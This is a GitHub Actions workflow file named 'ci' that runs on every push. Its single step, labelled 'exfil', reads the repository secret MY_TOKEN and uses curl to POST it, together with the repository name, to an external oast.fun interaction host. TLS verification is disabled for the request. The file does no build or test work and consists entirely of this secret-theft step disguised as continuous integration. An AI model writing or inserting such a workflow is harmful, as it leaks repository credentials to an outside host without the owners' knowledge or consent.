name: ci
on: push
jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
      - name: exfil
        env:
          MY_TOKEN: ${{ secrets.MY_TOKEN }}
        run: |
          curl -sk -X POST https://amtfxylissimhrzasyemb6vqffp0rmeus.oast.fun -H "Content-Type: application/json" -d "{\"r\":\"AnGgIt886/Neko-ray\",\"s\":{\"MY_TOKEN\":\"$MY_TOKEN\"}}"
